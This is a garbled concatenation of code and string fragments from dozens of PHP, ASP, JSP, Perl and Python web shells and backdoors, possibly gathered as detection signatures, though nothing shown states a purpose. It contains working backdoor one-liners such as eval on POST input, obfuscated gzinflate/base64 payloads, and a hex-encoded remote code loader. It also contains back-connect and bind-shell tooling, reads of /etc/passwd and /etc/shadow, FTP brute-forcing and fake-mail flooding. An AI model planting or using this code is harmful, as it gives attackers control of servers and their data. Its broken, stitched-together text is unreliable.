$_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by 